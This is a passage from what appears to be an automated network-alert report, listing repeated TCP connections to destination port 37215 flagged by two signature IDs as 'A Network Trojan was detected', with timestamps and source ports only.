              Timestamp:05/24/24-10:59:26.157586
              SID:2829579
              Source Port:41356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193949
              SID:2829579
              Source Port:57432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334254
              SID:2829579
              Source Port:60490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525311
              SID:2835222
              Source Port:60226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233351
              SID:2829579
              Source Port:54612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575135
              SID:2829579
              Source Port:33502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458352
              SID:2835222
              Source Port:38250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517314
              SID:2829579
              Source Port:32804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196958
              SID:2835222
              Source Port:58644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.599016
              SID:2829579
              Source Port:42196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062398
              SID:2835222
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551285
              SID:2829579
              Source Port:51374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522570
              SID:2835222
              Source Port:37700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117330
              SID:2835222
              Source Port:50702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823106
              SID:2835222
              Source Port:58070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.118326
              SID:2835222
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.968814
              SID:2829579
              Source Port:32984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.535977
              SID:2835222
              Source Port:44388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695189
              SID:2835222
              Source Port:56540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061896
              SID:2829579
              Source Port:41968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923310
              SID:2835222
              Source Port:43022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493067
              SID:2835222
              Source Port:36760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.885186
              SID:2829579
              Source Port:54620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.883509
              SID:2829579
              Source Port:54768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233745
              SID:2835222
              Source Port:54638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044979
              SID:2829579
              Source Port:39168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.207568
              SID:2829579
              Source Port:44614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.795996
              SID:2829579
              Source Port:38130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.059554
              SID:2829579
              Source Port:40246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300365
              SID:2829579
              Source Port:33096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455334
              SID:2829579
              Source Port:39866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.755572
              SID:2835222
              Source Port:41964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.474701
              SID:2835222
              Source Port:51940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503748
              SID:2829579
              Source Port:46632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.704279
              SID:2829579
              Source Port:59702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768357
              SID:2835222
              Source Port:45972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278661
              SID:2835222
              Source Port:55614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.700509
              SID:2829579
              Source Port:57682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432487
              SID:2835222
              Source Port:36952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621934
              SID:2829579
              Source Port:60398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.375103
              SID:2835222
              Source Port:48388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394624
              SID:2829579
              Source Port:35210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.113691
              SID:2829579
              Source Port:45384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764121
              SID:2835222
              Source Port:53940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.193945
              SID:2829579
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661285
              SID:2835222
              Source Port:48634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920915
              SID:2829579
              Source Port:49394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.917888
              SID:2835222
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493104
              SID:2835222
              Source Port:55636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433460
              SID:2829579
              Source Port:58880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878751
              SID:2829579
              Source Port:36304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926714
              SID:2829579
              Source Port:50084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661989
              SID:2829579
              Source Port:50336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.767083
              SID:2835222
              Source Port:43304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264699
              SID:2835222
              Source Port:57604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540625
              SID:2829579
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.119497
              SID:2829579
              Source Port:39088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365336
              SID:2835222
              Source Port:60742
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835148
              SID:2835222
              Source Port:56994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.281687
              SID:2835222
              Source Port:55370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576524
              SID:2829579
              Source Port:36848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727317
              SID:2835222
              Source Port:35396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535477
              SID:2835222
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103386
              SID:2835222
              Source Port:37330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279587
              SID:2835222
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.284613
              SID:2829579
              Source Port:50592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432542
              SID:2829579
              Source Port:42170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546111
              SID:2829579
              Source Port:40210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671658
              SID:2835222
              Source Port:43310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105715
              SID:2835222
              Source Port:35564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.797185
              SID:2835222
              Source Port:60338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.105527
              SID:2835222
              Source Port:60854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098832
              SID:2829579
              Source Port:53646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861868
              SID:2829579
              Source Port:49342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661967
              SID:2829579
              Source Port:51974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121532
              SID:2829579
              Source Port:50940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.425862
              SID:2835222
              Source Port:48772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727285
              SID:2835222
              Source Port:38446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478218
              SID:2835222
              Source Port:49276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.452777
              SID:2835222
              Source Port:60042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.994400
              SID:2835222
              Source Port:39184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457661
              SID:2835222
              Source Port:40554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233877
              SID:2829579
              Source Port:48846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061402
              SID:2835222
              Source Port:52432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368799
              SID:2835222
              Source Port:60418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.404530
              SID:2829579
              Source Port:52362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303422
              SID:2829579
              Source Port:37212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.567246
              SID:2835222
              Source Port:47104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374652
              SID:2829579
              Source Port:38820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492468
              SID:2829579
              Source Port:44458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.519495
              SID:2829579
              Source Port:41722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188151
              SID:2835222
              Source Port:41688
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.153034
              SID:2835222
              Source Port:39226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.685342
              SID:2829579
              Source Port:41200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921111
              SID:2835222
              Source Port:50344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.073198
              SID:2829579
              Source Port:37368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595465
              SID:2835222
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116682
              SID:2829579
              Source Port:42062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.428825
              SID:2835222
              Source Port:34020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.451924
              SID:2835222
              Source Port:59602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456396
              SID:2829579
              Source Port:52354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575264
              SID:2835222
              Source Port:56976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309230
              SID:2829579
              Source Port:49380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045465
              SID:2835222
              Source Port:34232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.537830
              SID:2829579
              Source Port:35712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872303
              SID:2835222
              Source Port:58232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628100
              SID:2835222
              Source Port:58180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502317
              SID:2835222
              Source Port:58636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108901
              SID:2829579
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965876
              SID:2835222
              Source Port:35082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538099
              SID:2835222
              Source Port:38674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485156
              SID:2829579
              Source Port:40528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578692
              SID:2829579
              Source Port:44468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061219
              SID:2835222
              Source Port:38956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054037
              SID:2835222
              Source Port:48364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154873
              SID:2829579
              Source Port:60132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546099
              SID:2829579
              Source Port:53260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661915
              SID:2829579
              Source Port:34256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154770
              SID:2835222
              Source Port:59828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725129
              SID:2835222
              Source Port:41154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.245804
              SID:2829579
              Source Port:45168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.157705
              SID:2829579
              Source Port:56344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.987602
              SID:2835222
              Source Port:40992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360704
              SID:2835222
              Source Port:57124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637682
              SID:2829579
              Source Port:60248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535533
              SID:2829579
              Source Port:45428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.099178
              SID:2835222
              Source Port:37190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189004
              SID:2829579
              Source Port:60580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394547
              SID:2829579
              Source Port:38284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.525784
              SID:2835222
              Source Port:52378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397179
              SID:2835222
              Source Port:52476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.538387
              SID:2829579
              Source Port:55432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573184
              SID:2829579
              Source Port:44988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210064
              SID:2829579
              Source Port:48906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502824
              SID:2829579
              Source Port:46642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.162222
              SID:2829579
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188352
              SID:2829579
              Source Port:51442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.485484
              SID:2835222
              Source Port:36714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341178
              SID:2829579
              Source Port:59660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697011
              SID:2835222
              Source Port:60978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233868
              SID:2835222
              Source Port:60848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368731
              SID:2829579
              Source Port:36544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.333851
              SID:2835222
              Source Port:51368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764966
              SID:2829579
              Source Port:49464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.077014
              SID:2835222
              Source Port:35244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341433
              SID:2829579
              Source Port:57116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.048668
              SID:2835222
              Source Port:51768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.121383
              SID:2829579
              Source Port:46770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595411
              SID:2835222
              Source Port:55448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640902
              SID:2835222
              Source Port:46196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.458110
              SID:2829579
              Source Port:49530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.116070
              SID:2835222
              Source Port:55672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.756220
              SID:2829579
              Source Port:59352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.543621
              SID:2829579
              Source Port:34224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633537
              SID:2829579
              Source Port:46128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503277
              SID:2835222
              Source Port:57566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.054426
              SID:2829579
              Source Port:49710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680386
              SID:2835222
              Source Port:40026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640312
              SID:2829579
              Source Port:60380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250913
              SID:2835222
              Source Port:50614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548107
              SID:2835222
              Source Port:51266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622014
              SID:2835222
              Source Port:41072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150657
              SID:2835222
              Source Port:36122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.594851
              SID:2835222
              Source Port:48778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430426
              SID:2829579
              Source Port:54182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102483
              SID:2835222
              Source Port:44772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727332
              SID:2829579
              Source Port:41672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117372
              SID:2835222
              Source Port:38946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.771725
              SID:2835222
              Source Port:52660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.283528
              SID:2835222
              Source Port:51140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450489
              SID:2829579
              Source Port:36104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103702
              SID:2835222
              Source Port:51632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431296
              SID:2829579
              Source Port:56352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.429741
              SID:2835222
              Source Port:39868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197273
              SID:2829579
              Source Port:40796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.861995
              SID:2835222
              Source Port:48570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121488
              SID:2829579
              Source Port:57962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802170
              SID:2835222
              Source Port:36174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545008
              SID:2829579
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122129
              SID:2835222
              Source Port:39226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071479
              SID:2835222
              Source Port:47336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.423373
              SID:2829579
              Source Port:35494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188340
              SID:2835222
              Source Port:58864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621391
              SID:2835222
              Source Port:51372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347592
              SID:2829579
              Source Port:59192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334146
              SID:2835222
              Source Port:35702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545006
              SID:2829579
              Source Port:32918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635604
              SID:2835222
              Source Port:59516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.804486
              SID:2835222
              Source Port:35270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.483632
              SID:2829579
              Source Port:48386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633958
              SID:2829579
              Source Port:58442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.266343
              SID:2835222
              Source Port:36934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447983
              SID:2829579
              Source Port:52460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.100771
              SID:2835222
              Source Port:44898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495229
              SID:2835222
              Source Port:48136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.429804
              SID:2835222
              Source Port:40830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.880363
              SID:2835222
              Source Port:59764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.457842
